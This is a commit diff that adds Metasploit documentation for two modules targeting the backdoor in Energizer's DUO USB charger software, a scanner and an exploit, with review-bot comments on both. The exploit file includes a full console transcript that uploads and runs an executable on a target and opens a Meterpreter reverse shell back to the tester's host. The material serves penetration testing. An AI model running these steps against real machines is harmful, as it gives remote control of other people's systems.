Commit
Showing 2 changed files with 63 additions and 0 deletions.
27 changes: 27 additions & 0 deletions
documentation/modules/auxiliary/scanner/backdoor/energizer_duo_detect.md
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,27 @@ | ||
## Vulnerable Application | ||
|
||
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan). | ||
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777. | ||
|
||
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx). | ||
|
||
## Verification Steps | ||
|
||
1. Install the vulnerable software | ||
2. Start msfconsole | ||
3. Do: `use auxiliary/scanner/backdoor/energizer_duo_detect` | ||
4. Do: `set rhosts` | ||
5. Do: `run` | ||
|
||
## Scenarios | ||
|
||
A run against the backdoor | ||
|
||
``` | ||
msf > use auxiliary/scanner/backdoor/energizer_duo_detect | ||
msf auxiliary(energizer_duo_detect) > set RHOSTS 192.168.0.0/24 | ||
msf auxiliary(energizer_duo_detect) > set THREADS 256 | ||
msf auxiliary(energizer_duo_detect) > run | ||
[*] 192.168.0.132:7777 FOUND: [["F", "AUTOEXEC.BAT"]... | ||
``` |
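Review bot: Step 4 of Verification Steps (`set rhosts`) has no value, so following the steps literally sets nothing; write it as `set rhosts [ip or range]` to match the Scenarios block, which uses `set RHOSTS 192.168.0.0/24`. The sample output line `FOUND: [["F", "AUTOEXEC.BAT"]...` is truncated and never explained, so add a sentence saying what the listed entries represent and how a reader should interpret a positive result. Under Vulnerable Application, the sentence describing the backdoor on port 7777 should come before the "More information" link rather than after it, and the Wayback Machine link could use https.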
36 changes: 36 additions & 0 deletions
documentation/modules/exploit/windows/backdoor/energizer_duo_payload.md
Original file line number | Diff line number | Diff line change |
---|---|---|
@@ -0,0 +1,36 @@ | ||
## Vulnerable Application | ||
|
||
More information can be found on the [Rapid7 Blog](https://community.rapid7.com/community/metasploit/blog/2010/03/08/locate-and-exploit-the-energizer-trojan). | ||
Energizer's "DUO" USB Battery Charger included a backdoor which listens on port 7777. | ||
|
||
The software can be downloaded from the [Wayback Machine](http://web.archive.org/web/20080722134654/www.energizer.com/usbcharger/language/english/download.aspx). | ||
|
||
## Verification Steps | ||
|
||
1. Install the vulnerable software | ||
2. Start msfconsole | ||
3. Do: `use exploit/windows/backdoor/energizer_duo_payload` | ||
4. Do: `set rhost` | ||
5. Do: `set payload` | ||
6. Do: `exploit` | ||
|
||
## Scenarios | ||
|
||
A run against the backdoor | ||
|
||
``` | ||
msf > use exploit/windows/backdoor/energizer_duo_payload | ||
msf exploit(energizer_duo_payload) > set RHOST 192.168.0.132 | ||
msf exploit(energizer_duo_payload) > set PAYLOAD windows/meterpreter/reverse_tcp | ||
msf exploit(energizer_duo_payload) > set LHOST 192.168.0.228 | ||
msf exploit(energizer_duo_payload) > exploit | ||
[*] Started reverse handler on 192.168.0.228:4444 | ||
[*] Trying to upload C:\NTL0ZTL4DhVL.exe... | ||
[*] Trying to execute C:\NTL0ZTL4DhVL.exe... | ||
[*] Sending stage (747008 bytes) | ||
[*] Meterpreter session 1 opened (192.168.0.228:4444 -> 192.168.0.132:1200) | ||
meterpreter > getuid | ||
Server username: XPDEV\Developer | ||
``` |
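Review bot: Steps 4 and 5 of Verification Steps (`set rhost`, `set payload`) carry no values, and the Scenarios run also sets `LHOST`, which the steps never mention; add placeholders such as `set rhost [ip]` and a step for LHOST so the steps reproduce the scenario. The transcript shows an executable being uploaded to `C:\` and executed, so the document should state whether the module removes that file afterwards or whether the tester has to clean it up. The Vulnerable Application text is copied verbatim from the detect module's document, so the same reordering applies here: describe the backdoor on port 7777 first, then give the "More information" link.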